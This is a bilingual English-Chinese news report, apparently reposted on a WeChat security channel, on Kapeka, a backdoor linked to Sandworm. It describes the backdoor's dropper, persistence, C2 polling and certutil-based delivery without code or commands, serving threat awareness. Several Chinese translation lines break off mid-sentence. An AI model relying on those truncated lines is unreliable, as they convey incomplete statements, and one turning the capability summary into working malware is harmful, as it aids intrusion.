A previously undocumented "flexible" backdoor called Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
一个先前未记录的"灵活"后门称为
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the same malware under the name KnuckleTouch.
这一发现来自芬兰网络安全公司WithSecure,将恶意软件归因于与俄罗斯有关的高级持续性威胁(APT)组织,其跟踪为<沙虫>(又名APT44或Seashell Blizzard)。微软正在以KnuckleTouch的名称跟踪相同的恶意软件。
"The malware [...] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate," security researcher Mohammad Kazem Hassan Nejad said.
"这种恶意软件[...]是一种灵活的后门,具有所有必要的功能,可以作为其运营商的早期工具包,还可以为受害者总部提供长期访问权。"安全研究员Mohammad Kazem Hassan Nejad说。
Kapeka comes fitted with a dropper that's designed to launch and execute a backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting up persistence for the backdoor either as a scheduled task or autorun registry, depending on whether the process has SYSTEM privileges.
Kapeka配备了一个分发程序,旨在在感染的主机上启动和执行后门组件,然后删除自身。该分发程序还负责为后门设置持久性,无论该进程是否具有SYSTEM特权,都会将后门设置为计划任务或自动运行注册表。
Microsoft, in its own advisory released in February 2024, described Kapeka as involved in multiple campaigns distributing ransomware and that it can be used to carry out a variety of functions, such as stealing credentials and other data, conducting destructive attacks, and granting threat actors remote access to the device.
微软在2024年2月发布的自己的<咨询>中描述了Kapeka参与了多个分发勒索软件的活动,并且可以用于执行各种功能,例如窃取凭据和其他数据,进行破坏性攻击,并授予威胁行为者对设备的远程访问权。
The backdoor is a Windows DLL written in C++ and features an embedded command-and-control (C2) configuration that's used to establish contact with an actor-controlled server and holds information about the frequency at which the server needs to be polled in order to retrieve commands.
后门是一个用C++编写的Windows DLL,并具有嵌入式命令和控制(C2)配置,用于与操纵者控制的服务器建立联系,并保存有关需要定期轮询服务器以检索命令的频率的信息。
Besides masquerading as a Microsoft Word add-in to make it appear genuine, the backdoor DLL gathers information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the results of the execution to the C2 server.
除了伪装成
"The backdoor uses WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component," Nejad explained. "The backdoor communicates with its C2 to poll for tasks and to send back fingerprinted information and task results. The backdoor utilizes JSON to send and receive information from its C2."
"后门使用WinHttp 5.1 COM接口(winhttpcom.dll)来实现其网络通信组件,"Nejad解释说。"后门与其C2通信以轮询任务并将指纹信息和任务结果发送回。后门利用JSON从其C2发送和接收信息。"
The implant is also capable of updating its C2 configuration on-the-fly by receiving a new version from the C2 server during polling. Some of the main features of the backdoor allow it to read and write files from and to disk, launch payloads, execute shell commands, and even upgrade and uninstall itself.
该植入物还能够通过在轮询过程中从C2服务器接收新版本来即时更新其C2配置。后门的一些主要功能允许它从磁盘读取和写入文件,启动有效载荷,执行shell命令,甚至升级和卸载自身。
The exact method through which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, underscoring the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the attack.
目前尚不清楚恶意软件传播的确切方法。但是,微软指出,分发程序是使用
Kapeka's connections to Sandworm come conceptual and configuration overlaps with previously disclosed families like GreyEnergy, a likely successor to the BlackEnergy toolkit, and Prestige.
Kapeka与Sandworm的连接与先前披露的系列如
"It is likely that Kapeka was used in intrusions that led to the deployment of Prestige ransomware in late 2022," WithSecure said. "It is probable that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm's arsenal."
"有可能Kapeka在导致2022年末部署
"The backdoor's victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin."
"后门的受害者学、罕见的目击和隐蔽和复杂程度表明APT级别的活动,高度可能是俄罗斯起源的。"
参考资料
[1]https://thehackernews.com/2024/04/russian-apt-deploys-new-kapeka-backdoor.html
关注我们
欢迎来到我们的公众号!我们专注于全球网络安全和精选双语资讯,为您带来最新的资讯和深入的分析。在这里,您可以了解世界各地的网络安全事件,同时通过我们的双语新闻,获取更多的行业知识。感谢您选择关注我们,我们将继续努力,为您带来有价值的内容。
原文始发于微信公众号(知机安全):俄罗斯APT在东欧攻击中部署新的'Kapeka'后门
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论